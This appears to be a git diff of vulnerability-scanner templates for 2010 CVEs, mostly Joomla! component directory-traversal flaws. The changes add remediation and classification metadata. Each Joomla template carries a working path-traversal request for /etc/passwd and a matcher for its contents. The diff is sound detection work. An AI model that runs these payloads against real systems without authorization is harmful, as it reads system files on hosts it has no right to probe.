diff --git a/cves/2010/CVE-2010-1532.yaml b/cves/2010/CVE-2010-1532.yaml index 594664996b..30496302cb 100644 --- a/cves/2010/CVE-2010-1532.yaml +++ b/cves/2010/CVE-2010-1532.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1532 - info: name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12118 - https://www.cvedetails.com/cve/CVE-2010-1532 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1532 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1533.yaml b/cves/2010/CVE-2010-1533.yaml index 03ef38a6ea..f5b0d08264 100644 --- a/cves/2010/CVE-2010-1533.yaml +++ b/cves/2010/CVE-2010-1533.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1533 - info: name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12142 - https://www.cvedetails.com/cve/CVE-2010-1533 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1533 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1534.yaml b/cves/2010/CVE-2010-1534.yaml index 871c657677..f7e0c06d48 100644 --- a/cves/2010/CVE-2010-1534.yaml +++ b/cves/2010/CVE-2010-1534.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1534 - info: name: Joomla! Component Shoutbox Pro - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version reference: - https://www.exploit-db.com/exploits/12067 - https://www.cvedetails.com/cve/CVE-2010-1534 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1534 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1535.yaml b/cves/2010/CVE-2010-1535.yaml index f4ad1e3c80..6c83bc4c32 100644 --- a/cves/2010/CVE-2010-1535.yaml +++ b/cves/2010/CVE-2010-1535.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1535 - info: name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12151 - https://www.cvedetails.com/cve/CVE-2010-1535 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1535 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1540.yaml b/cves/2010/CVE-2010-1540.yaml index b0afe05f6e..1bc5d76633 100644 --- a/cves/2010/CVE-2010-1540.yaml +++ b/cves/2010/CVE-2010-1540.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1540 - info: name: Joomla! Component com_blog - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + remediation: Upgrade to a supported version. reference: | - https://www.exploit-db.com/exploits/11625 - https://www.cvedetails.com/cve/CVE-2010-1540 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1540 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1601.yaml b/cves/2010/CVE-2010-1601.yaml index 40716c0829..adea054fa7 100644 --- a/cves/2010/CVE-2010-1601.yaml +++ b/cves/2010/CVE-2010-1601.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1601 - info: name: Joomla! Component JA Comment - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12236 - https://www.cvedetails.com/cve/CVE-2010-1601 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1601 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1602.yaml b/cves/2010/CVE-2010-1602.yaml index 9a766ef802..24c6ab5d3d 100644 --- a/cves/2010/CVE-2010-1602.yaml +++ b/cves/2010/CVE-2010-1602.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12283 - https://www.cvedetails.com/cve/CVE-2010-1602 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1602 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 + +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1603.yaml b/cves/2010/CVE-2010-1603.yaml index dc2b52c09b..ef76d5cd06 100644 --- a/cves/2010/CVE-2010-1603.yaml +++ b/cves/2010/CVE-2010-1603.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12284 - https://www.cvedetails.com/cve/CVE-2010-1603 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1603 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1607.yaml b/cves/2010/CVE-2010-1607.yaml index 81f69a9578..c3bc374891 100644 --- a/cves/2010/CVE-2010-1607.yaml +++ b/cves/2010/CVE-2010-1607.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component WMI 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12316 - https://www.cvedetails.com/cve/CVE-2010-1607 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1607 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 + +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1653.yaml b/cves/2010/CVE-2010-1653.yaml index fdc3e5d2a7..c9b4430df4 100644 --- a/cves/2010/CVE-2010-1653.yaml +++ b/cves/2010/CVE-2010-1653.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1653 - info: name: Joomla! Component Graphics 1.0.6 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. + description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12430 - https://www.cvedetails.com/cve/CVE-2010-1653 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1653 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1657.yaml b/cves/2010/CVE-2010-1657.yaml index b3bc8509e7..2ce660eabc 100644 --- a/cves/2010/CVE-2010-1657.yaml +++ b/cves/2010/CVE-2010-1657.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12428 - https://www.cvedetails.com/cve/CVE-2010-1657 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1657 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 + +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1658.yaml b/cves/2010/CVE-2010-1658.yaml index 1996fbeb69..c8fe3f3d38 100644 --- a/cves/2010/CVE-2010-1658.yaml +++ b/cves/2010/CVE-2010-1658.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1658 - info: name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12427 - https://www.cvedetails.com/cve/CVE-2010-1658 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1658 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1659.yaml b/cves/2010/CVE-2010-1659.yaml index fb4d569289..672a812657 100644 --- a/cves/2010/CVE-2010-1659.yaml +++ b/cves/2010/CVE-2010-1659.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1659 - info: name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12426 - https://www.cvedetails.com/cve/CVE-2010-1659 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1659 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1714.yaml b/cves/2010/CVE-2010-1714.yaml index 6ff7a55726..c48640c1a4 100644 --- a/cves/2010/CVE-2010-1714.yaml +++ b/cves/2010/CVE-2010-1714.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1714 - info: name: Joomla! Component Arcade Games 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12168 - https://www.cvedetails.com/cve/CVE-2010-1714 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1714 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1715.yaml b/cves/2010/CVE-2010-1715.yaml index 6eabdff378..fff88827c5 100644 --- a/cves/2010/CVE-2010-1715.yaml +++ b/cves/2010/CVE-2010-1715.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1715 - info: name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. + description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12174 - https://www.cvedetails.com/cve/CVE-2010-1715 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1715 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1717.yaml b/cves/2010/CVE-2010-1717.yaml index cb08bb4b40..e72f52bc54 100644 --- a/cves/2010/CVE-2010-1717.yaml +++ b/cves/2010/CVE-2010-1717.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1717 - info: name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12291 - https://www.cvedetails.com/cve/CVE-2010-1717 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1717 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1718.yaml b/cves/2010/CVE-2010-1718.yaml index 5ebbc5844c..bdd2dab463 100644 --- a/cves/2010/CVE-2010-1718.yaml +++ b/cves/2010/CVE-2010-1718.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1718 - info: name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12282 - https://www.cvedetails.com/cve/CVE-2010-1718 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1718 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1719.yaml b/cves/2010/CVE-2010-1719.yaml index b41a153cae..3dd8bbed2f 100644 --- a/cves/2010/CVE-2010-1719.yaml +++ b/cves/2010/CVE-2010-1719.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1719 - info: name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12233 - https://www.cvedetails.com/cve/CVE-2010-1719 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1719 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1722.yaml b/cves/2010/CVE-2010-1722.yaml index 6290c4d973..5a5e3abffd 100644 --- a/cves/2010/CVE-2010-1722.yaml +++ b/cves/2010/CVE-2010-1722.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1722 - info: name: Joomla! Component Online Market 2.x - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12177 - https://www.cvedetails.com/cve/CVE-2010-1722 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1722 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1723.yaml b/cves/2010/CVE-2010-1723.yaml index 4b5060444b..75c679e3e7 100644 --- a/cves/2010/CVE-2010-1723.yaml +++ b/cves/2010/CVE-2010-1723.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1723 - info: name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12289 - https://www.cvedetails.com/cve/CVE-2010-1723 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1723 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1858.yaml b/cves/2010/CVE-2010-1858.yaml index 084d817de4..fd57716f84 100644 --- a/cves/2010/CVE-2010-1858.yaml +++ b/cves/2010/CVE-2010-1858.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1858 - info: name: Joomla! Component SMEStorage - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/11853 - https://www.cvedetails.com/cve/CVE-2010-1858 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1858 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1870.yaml b/cves/2010/CVE-2010-1870.yaml index 75e15e4977..ade39e5007 100644 --- a/cves/2010/CVE-2010-1870.yaml +++ b/cves/2010/CVE-2010-1870.yaml @@ -1,10 +1,10 @@ id: CVE-2010-1870 - info: name: ListSERV Maestro <= 9.0-8 RCE author: b0yd severity: info - description: Struts-based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8. + description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8. + remediation: Update to the most recent version of ListSERV Maestro. reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt @@ -14,13 +14,11 @@ info: cvss-score: 5.0 cve-id: CVE-2010-1870 cwe-id: CWE-917 - requests: - method: GET path: - "{{BaseURL}}/lui/" - "{{BaseURL}}/hub/" - extractors: - type: regex regex: @@ -28,3 +26,4 @@ requests: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1873.yaml b/cves/2010/CVE-2010-1873.yaml index 4331b8702c..89441da8ea 100644 --- a/cves/2010/CVE-2010-1873.yaml +++ b/cves/2010/CVE-2010-1873.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1873 - info: name: Joomla! Component Jvehicles - Local File Inclusion author: daffainfo severity: high - description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. + description: A SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/11997 - https://www.cvedetails.com/cve/CVE-2010-1873 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1873 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1875.yaml b/cves/2010/CVE-2010-1875.yaml index 4db56ab46e..bedf489cfc 100644 --- a/cves/2010/CVE-2010-1875.yaml +++ b/cves/2010/CVE-2010-1875.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1875 - info: name: Joomla! Component Property - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/11851 - https://www.cvedetails.com/cve/CVE-2010-1875 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1875 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1878.yaml b/cves/2010/CVE-2010-1878.yaml index 551f28d4a6..99d3ce5167 100644 --- a/cves/2010/CVE-2010-1878.yaml +++ b/cves/2010/CVE-2010-1878.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1878 - info: name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12317 - https://www.cvedetails.com/cve/CVE-2010-1878 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1878 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1952.yaml b/cves/2010/CVE-2010-1952.yaml index 5e71f4a39f..5a36cd0c9b 100644 --- a/cves/2010/CVE-2010-1952.yaml +++ b/cves/2010/CVE-2010-1952.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1952 - info: name: Joomla! Component BeeHeard 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the BeeHeard 